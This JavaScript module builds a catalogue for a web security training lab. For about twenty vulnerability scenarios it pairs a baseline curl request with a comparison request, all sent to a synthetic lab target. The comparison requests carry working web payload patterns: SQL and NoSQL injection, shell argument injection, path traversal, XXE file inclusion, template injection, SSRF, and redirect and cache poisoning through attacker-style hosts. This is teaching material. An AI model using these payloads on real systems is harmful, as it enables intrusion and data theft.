const target = 'http://web-target:8080'

const definitions = [
  ['reflected-context','Reflected Context','BROWSER','FOUNDATION','A search page writes the decoded query into an HTML response without context-aware encoding.','reflected input crosses into markup context',`curl -s '${target}/search?q=operator'`,`curl -s '${target}/search?q=%3Cdc-marker%3E`,'Baseline renders operator as text.','Comparison returns the marker as raw markup.'],
  ['stored-context','Stored Context','BROWSER','INTERMEDIATE','A synthetic profile renderer combines stored display data with an interpreting DOM sink.','stored profile data reaches an interpreting browser sink',`curl -s '${target}/profile?user=clean'`,`curl -s '${target}/profile?user=marker'`,'Clean profile assigns display data safely.','Marker profile shows the stored value entering innerHTML.'],
  ['csrf-origin','Borrowed Authority','IDENTITY','INTERMEDIATE','A preference endpoint accepts an ambient session from a foreign origin without a request-bound token.','state change accepts ambient session without csrf binding',`curl -s -X POST -b 'session=LAB' -H 'Origin: https://academy.lab' '${target}/preferences?theme=dark'`,`curl -s -X POST -b 'session=LAB' -H 'Origin: https://foreign.invalid' '${target}/preferences?theme=red'`,'Trusted-origin request changes the synthetic preference.','Foreign-origin request also changes the preference.'],
  ['cors-reflection','Origin Mirror','BROWSER','INTERMEDIATE','A credentialed profile response reflects any Origin value ending in a misleading suffix.','credentialed cors decision trusts an attacker controlled origin',`curl -si -H 'Origin: https://app.lab' '${target}/cors/profile'`,`curl -si -H 'Origin: https://app.lab.attacker.invalid' '${target}/cors/profile'`,'Trusted origin receives the profile and exact ACAO.','Attacker subdomain is reflected with credential permission.'],
  ['sql-parameter','Query Fracture','SERVER','INTERMEDIATE','A catalog query concatenates a category into SQL instead of binding a typed value.','catalog filter is interpreted as sql structure',`curl -s '${target}/catalog?category=books'`,`curl -sG --data-urlencode "category=books' OR '1'='1" '${target}/catalog'`,'Baseline returns two book records.','Comparison changes query logic and returns all synthetic records.'],
  ['nosql-operator','Operator Drift','SERVER','INTERMEDIATE','A JSON lookup passes a caller-controlled object directly into a document query.','json operator changes the nosql match predicate',`curl -s -H 'Content-Type: application/json' -d '{"user":"lab-alice"}' '${target}/lookup'`,`curl -s -H 'Content-Type: application/json' -d '{"user":{"$ne":""}}' '${target}/lookup'`,'Scalar lookup returns only lab-alice.','Operator object returns multiple synthetic identities.'],
  ['command-argv','Argument Break','SERVER','ADVANCED','A diagnostic wrapper assembles caller input into shell source rather than a fixed argument vector.','diagnostic input crosses into shell grammar',`curl -s '${target}/diagnose?host=web-target'`,`curl -sG --data-urlencode 'host=web-target;printf DC_MARKER' '${target}/diagnose'`,'Baseline returns the designated host status.','Comparison reports an additional DC_MARKER process result.'],
  ['path-canonical','Root Escape','SERVER','INTERMEDIATE','A file service joins a decoded name to its content root without verifying the final canonical path.','decoded path escapes the intended content root',`curl -s '${target}/files?name=guide.txt'`,`curl -sG --data-urlencode 'name=../canary.txt' '${target}/files'`,'Baseline returns the public guide.','Comparison returns the designated outside-root canary.'],
  ['upload-trust','False Image','SERVER','INTERMEDIATE','An upload service trusts filename and declared media type without decoding the supplied content.','upload pipeline trusts caller metadata instead of content',`printf 'PNG-LAB' > /tmp/avatar.png && curl -s -F 'file=@/tmp/avatar.png;type=image/png' '${target}/upload'`,`printf 'DC_MARKER_TEXT' > /tmp/marker.txt && curl -s -F 'file=@/tmp/marker.txt;filename=avatar.png;type=image/png' '${target}/upload'`,'Baseline records an image fixture.','Comparison accepts text bytes as an image based on metadata.'],
  ['xxe-parser','Entity Window','PARSER','ADVANCED','An XML importer resolves a designated local external entity during document processing.','xml parser resolves a local external entity',`curl -s -H 'Content-Type: application/xml' --data '<order><id>7</id></order>' '${target}/xml'`,`curl -s -H 'Content-Type: application/xml' --data '<!DOCTYPE x [<!ENTITY dc SYSTEM "file:///opt/lab/canary.txt">]><order><id>&dc;</id></order>' '${target}/xml'`,'Baseline parses order 7.','Comparison incorporates the synthetic local canary.'],
  ['template-expression','Template Pulse','SERVER','ADVANCED','A welcome renderer compiles the caller-provided name as template source.','caller input is evaluated as template source',`curl -sG --data-urlencode 'name=Operator' '${target}/welcome'`,`curl -sG --data-urlencode 'name={{7*7}}' '${target}/welcome'`,'Baseline returns Welcome Operator.','Comparison returns evaluated value 49.'],
  ['typed-object','Type Confusion','PARSER','ADVANCED','A polymorphic object endpoint lets a caller select a class with an unexpected side effect.','caller controlled type selects an unapproved object variant',`curl -s -H 'Content-Type: application/json' -d '{"type":"Note","text":"hello"}' '${target}/object'`,`curl -s -H 'Content-Type: application/json' -d '{"type":"DebugMarker","text":"hello"}' '${target}/object'`,'Allowed Note type remains inert.','DebugMarker triggers the designated synthetic callback.'],
  ['ssrf-allowlist','Internal Fetch','NETWORK','ADVANCED','A server-side fetcher accepts arbitrary HTTP destinations and can reach an internal synthetic canary.','fetcher reaches an internal destination selected by the caller',`curl -sG --data-urlencode 'url=http://public-mock:8080/status' '${target}/fetch'`,`curl -sG --data-urlencode 'url=http://internal-canary:8080/status' '${target}/fetch'`,'Baseline reaches the approved mock destination.','Comparison reaches the internal-only canary.'],
  ['session-rotation','Session Afterlife','IDENTITY','INTERMEDIATE','A recovery transition advances password state but leaves the designated old session authorized.','password recovery fails to revoke the old session',`curl -s -H 'Authorization: Bearer SESSION_OLD' '${target}/me'`,`curl -s -X POST -H 'Authorization: Bearer RECOVERY' '${target}/reset' && curl -s -H 'Authorization: Bearer SESSION_OLD' '${target}/me'`,'Baseline proves the old session starts valid.','After reset, the same session remains authorized.'],
  ['bola-object','Foreign Order','AUTHORIZATION','INTERMEDIATE','An order API authenticates the caller but does not enforce tenant ownership on object reads.','tenant a identity reads the designated tenant b object',`curl -s -H 'Authorization: Bearer TENANT_A' '${target}/orders/A-100'`,`curl -s -H 'Authorization: Bearer TENANT_A' '${target}/orders/B-200'`,'Baseline returns the owned tenant A order.','Comparison returns the designated tenant B order.'],
  ['jwt-algorithm','Algorithm Trust','IDENTITY','ADVANCED','A token verifier derives its verification mode from the untrusted JWT header.','jwt verifier accepts a caller selected algorithm mode',`curl -s -H 'Authorization: Bearer GOOD_LAB_JWT' '${target}/admin'`,`curl -s -H 'Authorization: Bearer ALG_CONFUSION_LAB_JWT' '${target}/admin'`,'Baseline accepts the signed lab token.','Comparison accepts the synthetic algorithm-confusion token.'],
  ['oauth-redirect','Redirect Drift','IDENTITY','ADVANCED','An authorization endpoint validates redirect URIs with prefix matching instead of exact registration.','oauth authorization accepts an attacker controlled redirect prefix',`curl -si '${target}/oauth/authorize?client_id=academy&redirect_uri=https://academy.lab/callback&state=DC1'`,`curl -si '${target}/oauth/authorize?client_id=academy&redirect_uri=https://academy.lab.attacker.invalid/callback&state=DC1'`,'Baseline redirects to the registered callback.','Comparison redirects the synthetic code to the attacker-controlled host.'],
  ['graphql-field','Hidden Field','API','ADVANCED','A GraphQL endpoint protects the page but not a sensitive field resolver.','low privilege graphql query resolves a protected field',`curl -s -H 'Content-Type: application/json' -d '{"query":"{ me { id name } }"}' '${target}/graphql'`,`curl -s -H 'Content-Type: application/json' -d '{"query":"{ me { id billingToken } }"}' '${target}/graphql'`,'Baseline returns ordinary profile fields.','Comparison resolves the protected synthetic billing token.'],
  ['race-atomicity','Double Spend','LOGIC','ADVANCED','A single-use coupon check and mutation are separated, allowing two synchronized requests to commit.','concurrent requests violate the single use invariant',`curl -s '${target}/coupon/status'`,`dc-race '${target}/coupon/apply' 2`,'Baseline reports one remaining use.','Two synchronized requests are both accepted.'],
  ['framing-disagreement','Split Stream','PROTOCOL','EXPERT','A front parser and back parser disagree about the boundary of one supplied synthetic request stream.','adjacent http parsers disagree about request boundaries',`printf 'POST / HTTP/1.1\r\nContent-Length: 4\r\n\r\nTEST' | dc-frame`,`cat /opt/lab/ambiguous-request.txt | dc-frame`,'Baseline produces one request in both parsers.','Ambiguous stream produces different frontend and backend counts.'],
  ['cache-key','Unkeyed Host','CACHE','ADVANCED','A cached homepage varies on forwarded host metadata that is absent from the cache key.','unkeyed host input changes a cacheable response',`curl -si -H 'X-Forwarded-Host: academy.lab' '${target}/cache/home'`,`curl -si -H 'X-Forwarded-Host: attacker.invalid' '${target}/cache/home' && curl -si '${target}/cache/home'`,'Baseline caches a trusted absolute link.','Comparison stores and serves the attacker-controlled link under the same key.'],
  ['resource-budget','Report Furnace','API','ADVANCED','A report endpoint allocates work from caller-controlled rows and expansion depth before enforcing a budget.','one api request bypasses operation cost controls',`curl -s '${target}/report?rows=10'`,`curl -s '${target}/report?rows=100000&expand=all'`,'Baseline consumes ten cost units.','Comparison records excessive synthetic work before rejection.'],
]

export const webLabCatalog = definitions.map(([id,title,category,difficulty,brief,submission,baseline,comparison,baselineEvidence,comparisonEvidence],index)=>({
  id,title,category,difficulty,brief,submission,minutes:index<4?30:index<15?45:60,xp:index<4?400:index<15?650:900,
  objectives:['Read the scenario contract and declared stop condition','Establish the positive control','Run the one-variable security comparison','Submit the smallest evidence-backed condition'],
  steps:[
    { label:'Read scenario contract', command:`curl -s ${target}/labs/${id}/brief | jq`, evidence:`The live target identifies ${id}, the synthetic fixtures, and the authorized comparison.` },
    { label:'Establish positive control', command:baseline, evidence:baselineEvidence },
    { label:'Run security comparison', command:comparison, evidence:comparisonEvidence },
    { label:'Submit finding condition', command:`dc-submit ${id} "${submission}"`, evidence:'The target accepts the exact scenario condition and seals the evidence ledger.' },
  ],
  hint:`Preserve the baseline first. Then run only the designated comparison and describe the missing decision without adding untested impact.`,
}))

export const webLabById = Object.fromEntries(webLabCatalog.map(lab=>[lab.id,lab]))
